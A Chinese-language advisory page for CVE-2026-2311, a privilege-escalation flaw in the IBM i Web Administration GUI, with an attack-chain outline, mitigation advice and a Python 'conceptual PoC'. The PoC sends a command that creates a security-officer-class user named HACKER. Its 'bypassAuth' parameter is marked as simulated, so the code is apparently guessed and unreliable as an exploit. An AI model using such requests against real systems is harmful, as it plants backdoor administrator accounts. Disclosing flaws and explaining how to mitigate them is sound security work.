CVE-2026-2311 CVSS 6.4 中危

CVE-2026-2311 IBM i权限提升漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2311

漏洞类型

权限提升

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

IBM i

漏洞概述

IBM i 7.2至7.6版本存在权限提升漏洞。该漏洞源于IBM i Web Administration GUI中的授权检查机制失效。攻击者可利用此缺陷，诱使系统执行用户控制的代码，从而将其权限提升至管理员级别，造成严重的安全风险。

技术细节

该漏洞的核心在于IBM i Web Administration GUI中对于特定操作的授权验证逻辑存在缺陷。在受影响版本的系统中，后端服务器在处理来自Web管理界面的请求时，未能正确校验当前用户会话是否具备执行敏感系统操作或代码执行的权限。这种授权检查的失效，为权限提升创造了条件。利用方式上，攻击者首先需要拥有目标IBM i系统的合法用户账户，且该账户具备一定的初始权限（对应CVSS向量中的PR:H）。攻击者通过登录Web Administration GUI，在需要进行交互（UI:R）的场景下，构造并发送特定的恶意请求。由于系统未在执行关键代码前进行严格的权限复核，该请求被系统接受并执行。最终，攻击者提交的用户控制代码将在管理员权限下运行，从而完全控制系统，导致机密性、完整性和可用性的全面受损。

攻击链分析

STEP 1

信息收集

攻击者侦察目标IBM i系统，识别Web Administration GUI接口及其版本。

STEP 2

初始访问

攻击者使用一个拥有较高权限（PR:H）的合法账户登录Web管理界面。

STEP 3

漏洞利用

攻击者利用界面交互（UI:R），构造特定的数据包发送给存在缺陷的后端接口。

STEP 4

权限维持与提升

由于授权检查失效，系统以管理员权限执行攻击者提交的代码，完成权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-2311
# Target: IBM i Web Administration GUI
# Description: Exploits invalid authorization check to execute code with admin privileges.

target_host = "https://target-ibm-i-server:2001"
vulnerable_endpoint = "/HTTPAdmin/Servlet/AdminConfig"

# Attacker session cookie (requires valid high-privilege user login per PR:H)
headers = {
    "Cookie": "WASSESSIONID=attacker_session_cookie_value",
    "User-Agent": "Mozilla/5.0 (PoC Client)"
}

# Malicious payload to execute user-controlled code
# Example: Changing a user profile or running a CL command
data_payload = {
    "action": "executeCommand",
    "command": "CRTUSRPRF USRPRF(HACKER) PASSWORD(PWD123) CLASS(*SECOFR)",
    "bypassAuth": "true"  # Simulating the bypass logic
}

try:
    response = requests.post(target_host + vulnerable_endpoint, headers=headers, data=data_payload, verify=False)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command was executed with admin rights.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

IBM i 7.2

IBM i 7.3

IBM i 7.4

IBM i 7.5

IBM i 7.6

防御指南

临时缓解措施

在应用正式补丁之前，建议通过防火墙或网络策略限制对IBM i Web Administration GUI端口的访问，仅允许受信任的管理员IP进行连接。同时，应加强对系统管理员权限的管控，避免不必要的账户拥有高权限，并密切监控系统日志中是否存在异常的代码执行或配置变更行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2311
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2311
3 Details https://www.cvedetails.com/cve/CVE-2026-2311/
4 VulDB https://vuldb.com/cve/CVE-2026-2311
5 Link https://www.ibm.com/support/pages/node/7269560

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表